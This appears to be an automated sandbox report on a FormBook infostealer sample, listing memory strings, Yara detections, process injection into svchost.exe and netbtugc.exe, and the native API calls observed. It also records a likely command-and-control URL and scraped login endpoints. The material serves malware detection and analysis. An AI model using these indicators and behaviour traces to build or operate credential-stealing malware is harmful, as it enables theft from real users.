            Source: netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000006.00000002.4605259560.0000000004682000.00000004.10000000.00040000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604826888.0000000004072000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
            Source: netbtugc.exe, 00000006.00000002.4605259560.0000000004682000.00000004.10000000.00040000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604826888.0000000004072000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
            Source: netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000006.00000002.4603587776.000000000099B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000006.00000002.4603587776.000000000099B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000006.00000003.2517133851.00000000077DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: netbtugc.exe, 00000006.00000002.4603587776.000000000099B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000006.00000002.4603587776.000000000099B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033;
            Source: netbtugc.exe, 00000006.00000002.4603587776.000000000099B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000006.00000002.4603587776.000000000099B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000006.00000002.4605259560.0000000004CCA000.00000004.10000000.00040000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604826888.00000000046BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.empowermedeco.com/fo8o/?U6YDsxW=mxnR
            Source: netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: netbtugc.exe, 00000006.00000002.4605259560.000000000435E000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4606811514.0000000005F40000.00000004.00000800.00020000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604826888.0000000003D4E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
            Source: UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604826888.0000000003D4E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F36B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00F36B0C
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F36D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00F36D07
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F36B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00F36B0C
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F22B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00F22B37
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F4F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00F4F7FF

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.4606386701.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4603419849.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2318504585.0000000003310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4603077046.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4604764076.0000000002BC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2319589382.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2317721202.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4603508977.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.4606386701.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4603419849.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2318504585.0000000003310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4603077046.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4604764076.0000000002BC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2319589382.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2317721202.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4603508977.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: This is a third-party compiled AutoIt script.0_2_00EE3D19
            Source: CCE 30411252024.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: CCE 30411252024.exe, 00000000.00000000.2141218806.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_3eda7f78-c
            Source: CCE 30411252024.exe, 00000000.00000000.2141218806.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_f5f51cf8-2
            Source: CCE 30411252024.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_da16554d-d
            Source: CCE 30411252024.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d0371057-6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042B363 NtClose,2_2_0042B363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572B60 NtClose,LdrInitializeThunk,2_2_03572B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03572DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03572C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035735C0 NtCreateMutant,LdrInitializeThunk,2_2_035735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03574340 NtSetContextThread,2_2_03574340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03574650 NtSuspendThread,2_2_03574650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572BF0 NtAllocateVirtualMemory,2_2_03572BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572BE0 NtQueryValueKey,2_2_03572BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572B80 NtQueryInformationFile,2_2_03572B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572BA0 NtEnumerateValueKey,2_2_03572BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572AD0 NtReadFile,2_2_03572AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572AF0 NtWriteFile,2_2_03572AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572AB0 NtWaitForSingleObject,2_2_03572AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572F60 NtCreateProcessEx,2_2_03572F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572F30 NtCreateSection,2_2_03572F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572FE0 NtCreateFile,2_2_03572FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572F90 NtProtectVirtualMemory,2_2_03572F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572FB0 NtResumeThread,2_2_03572FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572FA0 NtQuerySection,2_2_03572FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572E30 NtWriteVirtualMemory,2_2_03572E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572EE0 NtQueueApcThread,2_2_03572EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572E80 NtReadVirtualMemory,2_2_03572E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572EA0 NtAdjustPrivilegesToken,2_2_03572EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572D10 NtMapViewOfSection,2_2_03572D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572D00 NtSetInformationFile,2_2_03572D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572D30 NtUnmapViewOfSection,2_2_03572D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572DD0 NtDelayExecution,2_2_03572DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572DB0 NtEnumerateKey,2_2_03572DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572C60 NtCreateKey,2_2_03572C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572C00 NtQueryInformationProcess,2_2_03572C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572CC0 NtQueryVirtualMemory,2_2_03572CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572CF0 NtOpenProcess,2_2_03572CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572CA0 NtQueryInformationToken,2_2_03572CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03573010 NtOpenDirectoryObject,2_2_03573010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03573090 NtSetValueKey,2_2_03573090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035739B0 NtGetContextThread,2_2_035739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03573D70 NtOpenThread,2_2_03573D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03573D10 NtOpenProcessToken,2_2_03573D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E4340 NtSetContextThread,LdrInitializeThunk,6_2_031E4340
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E4650 NtSuspendThread,LdrInitializeThunk,6_2_031E4650
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E2B60 NtClose,LdrInitializeThunk,6_2_031E2B60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_031E2BA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_031E2BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_031E2BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E2AD0 NtReadFile,LdrInitializeThunk,6_2_031E2AD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E2AF0 NtWriteFile,LdrInitializeThunk,6_2_031E2AF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E2F30 NtCreateSection,LdrInitializeThunk,6_2_031E2F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E2FB0 NtResumeThread,LdrInitializeThunk,6_2_031E2FB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E2FE0 NtCreateFile,LdrInitializeThunk,6_2_031E2FE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_031E2E80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_031E2EE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_031E2D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_031E2D30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E2DD0 NtDelayExecution,LdrInitializeThunk,6_2_031E2DD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_031E2DF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_031E2C70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E2C60 NtCreateKey,LdrInitializeThunk,6_2_031E2C60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_031E2CA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E35C0 NtCreateMutant,LdrInitializeThunk,6_2_031E35C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E39B0 NtGetContextThread,LdrInitializeThunk,6_2_031E39B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E2B80 NtQueryInformationFile,6_2_031E2B80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E2AB0 NtWaitForSingleObject,6_2_031E2AB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E2F60 NtCreateProcessEx,6_2_031E2F60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E2F90 NtProtectVirtualMemory,6_2_031E2F90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E2FA0 NtQuerySection,6_2_031E2FA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E2E30 NtWriteVirtualMemory,6_2_031E2E30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E2EA0 NtAdjustPrivilegesToken,6_2_031E2EA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E2D00 NtSetInformationFile,6_2_031E2D00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E2DB0 NtEnumerateKey,6_2_031E2DB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E2C00 NtQueryInformationProcess,6_2_031E2C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E2CC0 NtQueryVirtualMemory,6_2_031E2CC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E2CF0 NtOpenProcess,6_2_031E2CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E3010 NtOpenDirectoryObject,6_2_031E3010
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E3090 NtSetValueKey,6_2_031E3090
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E3D10 NtOpenProcessToken,6_2_031E3D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E3D70 NtOpenThread,6_2_031E3D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_00547920 NtCreateFile,6_2_00547920
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_00547A70 NtReadFile,6_2_00547A70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_00547B50 NtDeleteFile,6_2_00547B50
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_00547BE0 NtClose,6_2_00547BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_00547D30 NtAllocateVirtualMemory,6_2_00547D30
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F26685: CreateFileW,DeviceIoControl,CloseHandle,0_2_00F26685
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F1ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00F1ACC5
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F279D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00F279D3
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F0B0430_2_00F0B043
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00EF32000_2_00EF3200
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F1410F0_2_00F1410F
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F002A40_2_00F002A4
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00EEE3B00_2_00EEE3B0
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F1038E0_2_00F1038E
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F006D90_2_00F006D9
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F1467F0_2_00F1467F
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F4AACE0_2_00F4AACE
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F14BEF0_2_00F14BEF
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F0CCC10_2_00F0CCC1
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00EEAF500_2_00EEAF50
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00EE6F070_2_00EE6F07
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F431BC0_2_00F431BC
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F0D1B90_2_00F0D1B9
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00EFB11F0_2_00EFB11F
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F1724D0_2_00F1724D
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F0123A0_2_00F0123A
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00EE93F00_2_00EE93F0
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F213CA0_2_00F213CA
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00EFF5630_2_00EFF563
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00EE96C00_2_00EE96C0
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F2B6CC0_2_00F2B6CC
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F4F7FF0_2_00F4F7FF
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00EE77B00_2_00EE77B0
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F179C90_2_00F179C9
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00EFFA570_2_00EFFA57
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00EE9B600_2_00EE9B60
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00EF3B700_2_00EF3B70
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00EE7D190_2_00EE7D19
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F09ED00_2_00F09ED0
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00EFFE6F0_2_00EFFE6F
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00EE7FA30_2_00EE7FA3
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_010592F80_2_010592F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004168712_2_00416871
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004168732_2_00416873
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004028A02_2_004028A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101732_2_00410173
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011102_2_00401110
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1F32_2_0040E1F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012902_2_00401290
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004035002_2_00403500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040268A2_2_0040268A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026982_2_00402698
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026A02_2_004026A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FF4A2_2_0040FF4A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042D7532_2_0042D753
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FF532_2_0040FF53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FA3522_2_035FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036003E62_2_036003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E3F02_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E02742_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C02C02_2_035C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C81582_2_035C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DA1182_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035301002_2_03530100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F81CC2_2_035F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036001AA2_2_036001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D20002_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035647502_2_03564750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035407702_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353C7C02_2_0353C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355C6E02_2_0355C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035405352_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036005912_2_03600591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F24462_2_035F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EE4F62_2_035EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FAB402_2_035FAB40
